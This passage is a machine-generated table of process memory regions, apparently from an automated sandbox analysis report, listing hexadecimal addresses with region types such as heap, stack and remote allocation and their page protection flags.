heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
3765000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
A90000
|
remote allocation
|
page read and write
|
||
3425000
|
trusted library allocation
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
9C2000
|
unkown
|
page execute and read and write
|
||
800000
|
heap
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
3758000
|
heap
|
page read and write
|
||
24911442000
|
heap
|
page read and write
|
||
473F000
|
stack
|
page read and write
|
||
36FF000
|
stack
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
1DD5C000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
1DFDF0B0000
|
heap
|
page read and write
|
||
3798000
|
heap
|
page read and write
|
||
37B1000
|
heap
|
page read and write
|
||
3C9F000
|
stack
|
page read and write
|
||
49BF000
|
stack
|
page read and write
|
||
40AF000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
32FE000
|
stack
|
page read and write
|
||
379E000
|
heap
|
page read and write
|
||
249113D0000
|
heap
|
page read and write
|
||
34BE000
|
stack
|
page read and write
|
||
777000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
C63000
|
heap
|
page read and write
|
||
3317000
|
trusted library allocation
|
page read and write
|
||
1C6EE000
|
stack
|
page read and write
|
||
16DE000
|
stack
|
page read and write
|
||
C89000
|
unkown
|
page write copy
|
||
2D8F15E0000
|
heap
|
page read and write
|
||
37B6000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
378E000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
3742000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
7FFD9BAD0000
|
trusted library allocation
|
page execute and read and write
|
||
4611000
|
heap
|
page read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
EA474FF000
|
stack
|
page read and write
|
||
133C3000
|
trusted library allocation
|
page read and write
|
||
7AE000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
375A000
|
heap
|
page read and write
|
||
DF8000
|
heap
|
page read and write
|
||
3794000
|
heap
|
page read and write
|
||
7F4000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
88B000
|
heap
|
page read and write
|
||
7FFD9B9B4000
|
trusted library allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
3789000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
11F6000
|
stack
|
page read and write
|
||
3774000
|
heap
|
page read and write
|
||
37AE000
|
heap
|
page read and write
|
||
4D31000
|
direct allocation
|
page read and write
|
||
6A10000
|
heap
|
page read and write
|
||
373E000
|
heap
|
page read and write
|
||
356E000
|
stack
|
page read and write
|
||
3509000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
1DFDEF20000
|
remote allocation
|
page read and write
|
||
1DFDEEE0000
|
heap
|
page read and write
|
||
2D6E2970000
|
heap
|
page read and write
|
||
374C000
|
heap
|
page read and write
|
||
37C0000
|
heap
|
page read and write
|
||
838C000
|
stack
|
page read and write
|
||
37C9000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
3756000
|
heap
|
page read and write
|
||
3779000
|
heap
|
page read and write
|
||
960000
|
unkown
|
page readonly
|
||
C89000
|
unkown
|
page write copy
|
||
3A4F000
|
stack
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
28AE000
|
stack
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
212B5400000
|
heap
|
page read and write
|
||
26CC26FA000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
376A000
|
heap
|
page read and write
|
||
373E000
|
heap
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
7FFD9BA66000
|
trusted library allocation
|
page execute and read and write
|
||
437F000
|
stack
|
page read and write
|
||
373A000
|
heap
|
page read and write
|
||
373E000
|
heap
|
page read and write
|
||
1200000
|
heap
|
page read and write
|
||
4E60000
|
direct allocation
|
page execute and read and write
|
||
212B5402000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
7FFD9B9A4000
|
trusted library allocation
|
page read and write
|
||
178E000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
EE8000
|
unkown
|
page execute and read and write
|
||
212B53A0000
|
remote allocation
|
page read and write
|
||
54C0000
|
direct allocation
|
page execute and read and write
|
||
2AEE000
|
stack
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
13448000
|
trusted library allocation
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
37A3000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
1CF9E000
|
stack
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
4A10000
|
direct allocation
|
page execute and read and write
|
||
4611000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
4622000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
C10000
|
direct allocation
|
page execute and read and write
|
||
778000
|
heap
|
page read and write
|
||
2D6E2A4F000
|
heap
|
page read and write
|
||
1DFA0000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
590C000
|
stack
|
page read and write
|
||
3788000
|
heap
|
page read and write
|
||
960000
|
heap
|
page read and write
|
||
3700000
|
heap
|
page read and write
|
||
720000
|
remote allocation
|
page read and write
|
||
330C000
|
trusted library allocation
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
9D0000
|
heap
|
page read and write
|
||
28DD000
|
stack
|
page read and write
|
||
1290000
|
heap
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
377D000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
432F000
|
stack
|
page read and write
|
||
580D000
|
stack
|
page read and write
|
||
4E60000
|
direct allocation
|
page execute and read and write
|
||
373E000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7E2000
|
heap
|
page read and write
|
||
3797000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7FFD9BA5C000
|
trusted library allocation
|
page execute and read and write
|
||
8BB000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3765000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
88E000
|
heap
|
page read and write
|
||
50A000
|
heap
|
page read and write
|
||
378B000
|
heap
|
page read and write
|
||
3780000
|
heap
|
page read and write
|
||
787000
|
heap
|
page read and write
|
||
37C8000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
406000
|
unkown
|
page readonly
|
||
41BF000
|
stack
|
page read and write
|
||
37C7000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
1BDF0000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
E70000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
1DFCA000
|
heap
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
8BB000
|
heap
|
page read and write
|
||
905000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
EA4747F000
|
stack
|
page read and write
|
||
50D000
|
heap
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
3777000
|
heap
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
93D000
|
heap
|
page read and write
|
||
341D000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
106A000
|
heap
|
page read and write
|
||
1BD3D000
|
stack
|
page read and write
|
||
54F0000
|
direct allocation
|
page execute and read and write
|
||
8C0000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
37E0000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
39BE000
|
stack
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page execute and read and write
|
||
87A000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
9C9000
|
unkown
|
page write copy
|
||
4EC1000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
1DB9E000
|
stack
|
page read and write
|
||
37B9000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
8CB000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
37AE000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
7FFD9B9DD000
|
trusted library allocation
|
page execute and read and write
|
||
15952CF3000
|
heap
|
page read and write
|
||
C6A000
|
unkown
|
page execute and read and write
|
||
37BA000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
36F0000
|
heap
|
page read and write
|
||
8BC000
|
heap
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
598000
|
heap
|
page read and write
|
||
37C8000
|
heap
|
page read and write
|
||
414000
|
unkown
|
page readonly
|
||
3411000
|
trusted library allocation
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
373E000
|
heap
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
1E4AB000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
38FA000
|
trusted library allocation
|
page read and write
|
||
463E000
|
stack
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
3739000
|
heap
|
page read and write
|
||
374A000
|
heap
|
page read and write
|
||
7FFD9BB30000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA56000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page execute and read and write
|
||
8B4000
|
heap
|
page read and write
|
||
22798FF0000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
44FE000
|
stack
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
4C20000
|
direct allocation
|
page execute and read and write
|
||
333F000
|
stack
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
37E0000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
4DB4000
|
heap
|
page read and write
|
||
379E000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
1240000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
158B000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
335E000
|
trusted library allocation
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
1E49C000
|
stack
|
page read and write
|
||
14A0000
|
direct allocation
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
F2B000
|
unkown
|
page execute and write copy
|
||
3783000
|
heap
|
page read and write
|
||
379E000
|
heap
|
page read and write
|
||
3F0000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
3765000
|
heap
|
page read and write
|
||
373C000
|
heap
|
page read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
7BB000
|
heap
|
page read and write
|
||
4E70000
|
direct allocation
|
page execute and read and write
|
||
40BE000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
B85000
|
heap
|
page read and write
|
||
7FFD9BB30000
|
trusted library allocation
|
page execute and read and write
|
||
1C58E000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
3740000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
C89000
|
unkown
|
page write copy
|
||
8CE000
|
heap
|
page read and write
|
||
378A000
|
trusted library allocation
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
378B000
|
heap
|
page read and write
|
||
1DFDEFA4000
|
heap
|
page read and write
|
||
899000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
212B5370000
|
heap
|
page read and write
|
||
375B000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
1DFF0000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
4F8000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
4A30000
|
direct allocation
|
page execute and read and write
|
||
4440000
|
heap
|
page read and write
|
||
1D7EE000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3743000
|
heap
|
page read and write
|
||
4A20000
|
direct allocation
|
page execute and read and write
|
||
37B9000
|
heap
|
page read and write
|
||
3FFE000
|
stack
|
page read and write
|
||
35FE000
|
stack
|
page read and write
|
||
1D47E000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
B10000
|
heap
|
page read and write
|
||
4EC1000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
92E000
|
stack
|
page read and write
|
||
4441000
|
heap
|
page read and write
|
||
1BA1D000
|
stack
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
3E7F000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
F0E000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
1CE8E000
|
stack
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
7EDE000
|
stack
|
page read and write
|
||
7FFD9B9C2000
|
trusted library allocation
|
page read and write
|
||
1D07E000
|
stack
|
page read and write
|
||
30DE000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
180000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
5F4ABDC000
|
stack
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
379B000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
379E000
|
heap
|
page read and write
|
||
3436000
|
trusted library allocation
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
383F000
|
stack
|
page read and write
|
||
4E60000
|
direct allocation
|
page execute and read and write
|
||
407F000
|
stack
|
page read and write
|
||
7E2000
|
heap
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
7FFD9B973000
|
trusted library allocation
|
page execute and read and write
|
||
4F00000
|
direct allocation
|
page execute and read and write
|
||
37AC000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
212B53D0000
|
heap
|
page read and write
|
||
B50000
|
heap
|
page read and write
|
||
3E9C000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
375A000
|
heap
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
3757000
|
heap
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
3000000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
D70000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
10C0000
|
unkown
|
page execute and read and write
|
||
3773000
|
heap
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
4600000
|
direct allocation
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
3BAF000
|
stack
|
page read and write
|
||
2DBF000
|
stack
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
377E000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
899000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3787000
|
heap
|
page read and write
|
||
87A000
|
heap
|
page read and write
|
||
7FFD9B9BD000
|
trusted library allocation
|
page execute and read and write
|
||
830000
|
heap
|
page read and write
|
||
7FFD9B9DC000
|
trusted library allocation
|
page execute and read and write
|
||
7BE000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
35BE000
|
stack
|
page read and write
|
||
F3A7FFE000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
37A3000
|
heap
|
page read and write
|
||
8BB000
|
heap
|
page read and write
|
||
7FFD9B9AD000
|
trusted library allocation
|
page execute and read and write
|
||
413E000
|
stack
|
page read and write
|
||
4CD0000
|
direct allocation
|
page execute and read and write
|
||
802000
|
heap
|
page read and write
|
||
4441000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
2C6F000
|
stack
|
page read and write
|
||
7FFD9B9A3000
|
trusted library allocation
|
page execute and read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
1DF9B000
|
stack
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
37B1000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
40F000
|
unkown
|
page write copy
|
||
800000
|
heap
|
page read and write
|
||
605E000
|
stack
|
page read and write
|
||
36BE000
|
stack
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
2B6D000
|
heap
|
page read and write
|
||
37B0000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
391B000
|
trusted library allocation
|
page read and write
|
||
C82000
|
unkown
|
page execute and read and write
|
||
961000
|
unkown
|
page execute and write copy
|
||
DC5A6FF000
|
stack
|
page read and write
|
||
37C4000
|
heap
|
page read and write
|
||
377F000
|
heap
|
page read and write
|
||
C80000
|
heap
|
page read and write
|
||
17E0000
|
heap
|
page execute and read and write
|
||
93D000
|
heap
|
page read and write
|
||
782000
|
heap
|
page read and write
|
||
88B000
|
heap
|
page read and write
|
||
12FC000
|
heap
|
page read and write
|
||
26CC2739000
|
heap
|
page read and write
|
||
8B4000
|
heap
|
page read and write
|
||
12FA7000
|
trusted library allocation
|
page read and write
|
||
D95000
|
heap
|
page read and write
|
||
4A80000
|
direct allocation
|
page execute and read and write
|
||
3744000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
3190000
|
heap
|
page read and write
|
||
BCA000
|
heap
|
page read and write
|
||
1DFDEF40000
|
heap
|
page read and write
|
||
4C7E000
|
stack
|
page read and write
|
||
7FFD9B992000
|
trusted library allocation
|
page read and write
|
||
3AFE000
|
stack
|
page read and write
|
||
1DFDEF61000
|
heap
|
page read and write
|
||
37B5000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
8B4000
|
heap
|
page read and write
|
||
37B2000
|
heap
|
page read and write
|
||
1D9AE000
|
stack
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
39BE000
|
stack
|
page read and write
|
||
1DFDEF56000
|
heap
|
page read and write
|
||
54C0000
|
direct allocation
|
page execute and read and write
|
||
7BE000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
2D8F18D5000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
7FFD9BA86000
|
trusted library allocation
|
page execute and read and write
|
||
379F000
|
heap
|
page read and write
|
||
A02000
|
heap
|
page read and write
|
||
8BC000
|
heap
|
page read and write
|
||
1300000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7A5000
|
heap
|
page read and write
|
||
84C000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
3764000
|
heap
|
page read and write
|
||
37F0000
|
heap
|
page read and write
|
||
37B3000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
7FFD9B98D000
|
trusted library allocation
|
page execute and read and write
|
||
329E000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
E4C000
|
heap
|
page read and write
|
||
37A1000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
3765000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
3419000
|
trusted library allocation
|
page read and write
|
||
A0A000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
1BF90000
|
heap
|
page execute and read and write
|
||
3FBF000
|
stack
|
page read and write
|
||
820000
|
trusted library allocation
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
7FFD9B9CD000
|
trusted library allocation
|
page execute and read and write
|
||
10C1000
|
unkown
|
page execute and write copy
|
||
802000
|
heap
|
page read and write
|
||
840000
|
heap
|
page read and write
|
||
57AE000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
36AF000
|
stack
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
1C66F000
|
stack
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
38F5000
|
trusted library allocation
|
page read and write
|
||
41EF000
|
stack
|
page read and write
|
||
3D7E000
|
stack
|
page read and write
|
||
C20000
|
unkown
|
page readonly
|
||
367F000
|
stack
|
page read and write
|
||
D57000
|
heap
|
page read and write
|
||
37F4000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
37AF000
|
heap
|
page read and write
|
||
374B000
|
heap
|
page read and write
|
||
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
37C6000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
4841000
|
heap
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
3369000
|
trusted library allocation
|
page read and write
|
||
DC5A67F000
|
stack
|
page read and write
|
||
37B1000
|
heap
|
page read and write
|
||
3786000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
7FFD9BA0C000
|
trusted library allocation
|
page execute and read and write
|
||
936000
|
heap
|
page read and write
|
||
1E28B000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
1DFDEE00000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
7FFD9B9B2000
|
trusted library allocation
|
page read and write
|
||
16EF000
|
stack
|
page read and write
|
||
CEC000
|
heap
|
page read and write
|
||
4830000
|
direct allocation
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
3B4000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
3757000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
8CF000
|
heap
|
page read and write
|
||
375A000
|
heap
|
page read and write
|
||
4EA0000
|
direct allocation
|
page execute and read and write
|
||
358D000
|
trusted library allocation
|
page read and write
|
||
2B6B000
|
heap
|
page read and write
|
||
7CB000
|
heap
|
page read and write
|
||
3BEE000
|
stack
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
8CD000
|
heap
|
page read and write
|
||
379F000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
3789000
|
heap
|
page read and write
|
||
33FF000
|
stack
|
page read and write
|
||
7A1000
|
heap
|
page read and write
|
||
4A00000
|
direct allocation
|
page execute and read and write
|
||
4EBF000
|
stack
|
page read and write
|
||
A70000
|
heap
|
page read and write
|
||
E1C000
|
heap
|
page read and write
|
||
1DFDEF94000
|
heap
|
page read and write
|
||
37A3000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
4441000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
332E000
|
stack
|
page read and write
|
||
B91000
|
heap
|
page read and write
|
||
C62A3FE000
|
stack
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
7BE000
|
heap
|
page read and write
|
||
3750000
|
heap
|
page read and write
|
||
640000
|
heap
|
page read and write
|
||
40FF000
|
stack
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
377D000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
212B53C9000
|
heap
|
page read and write
|
||
7FFD9B9DC000
|
trusted library allocation
|
page execute and read and write
|
||
802000
|
heap
|
page read and write
|
||
630000
|
direct allocation
|
page read and write
|
||
37CD000
|
heap
|
page read and write
|
||
1245000
|
heap
|
page read and write
|
||
8C0000
|
heap
|
page read and write
|
||
8AE000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
7B5000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
E18000
|
heap
|
page read and write
|
||
12FA3000
|
trusted library allocation
|
page read and write
|
||
7A6000
|
heap
|
page read and write
|
||
477E000
|
stack
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
3742000
|
heap
|
page read and write
|
||
7FFD9BA70000
|
trusted library allocation
|
page execute and read and write
|
||
1DFDEF8D000
|
heap
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
3796000
|
heap
|
page read and write
|
||
7FFD9B9AB000
|
trusted library allocation
|
page execute and read and write
|
||
7CB000
|
heap
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
1DFDEF7C000
|
heap
|
page read and write
|
||
37CD000
|
heap
|
page read and write
|
||
4611000
|
heap
|
page read and write
|
||
912000
|
heap
|
page read and write
|
||
4E60000
|
direct allocation
|
page execute and read and write
|
||
899000
|
heap
|
page read and write
|
||
876000
|
heap
|
page read and write
|
||
3758000
|
heap
|
page read and write
|
||
3BFF000
|
stack
|
page read and write
|
||
1C7AF000
|
stack
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
37D4000
|
heap
|
page read and write
|
||
7FFD9B9C2000
|
trusted library allocation
|
page read and write
|
||
3C3D000
|
stack
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
B80000
|
trusted library allocation
|
page read and write
|
||
1F09E000
|
stack
|
page read and write
|
||
4CBC000
|
stack
|
page read and write
|
||
9F4000
|
stack
|
page read and write
|
||
830000
|
heap
|
page read and write
|
||
CE0000
|
heap
|
page execute and read and write
|
||
2E000
|
unkown
|
page readonly
|
||
899000
|
heap
|
page read and write
|
||
37B8000
|
heap
|
page read and write
|
||
4AA0000
|
direct allocation
|
page read and write
|
||
37AC000
|
heap
|
page read and write
|
||
7FFD9BA96000
|
trusted library allocation
|
page execute and read and write
|
||
1EC9F000
|
stack
|
page read and write
|
||
8CA000
|
heap
|
page read and write
|
||
7BB000
|
heap
|
page read and write
|
||
37F6000
|
heap
|
page read and write
|
||
37BA000
|
heap
|
page read and write
|
||
249115F0000
|
heap
|
page read and write
|
||
914000
|
heap
|
page read and write
|
||
800000
|
heap
|
page read and write
|
||
4C50000
|
direct allocation
|
page execute and read and write
|
||
1C95D000
|
stack
|
page read and write
|
||
7A0000
|
heap
|
page read and write
|
||
8C9000
|
heap
|
page read and write
|
||
3767000
|
heap
|
page read and write
|
||
37B2000
|
heap
|
page read and write
|
||
37CC000
|
heap
|
page read and write
|
||
802000
|
heap
|
page read and write
|
||
379E000
|
heap
|
page read and write
|
||
2D8F18D0000
|
heap
|
page read and write
|
||
3782000
|
heap
|
page read and write
|
||
A11000
|
heap
|
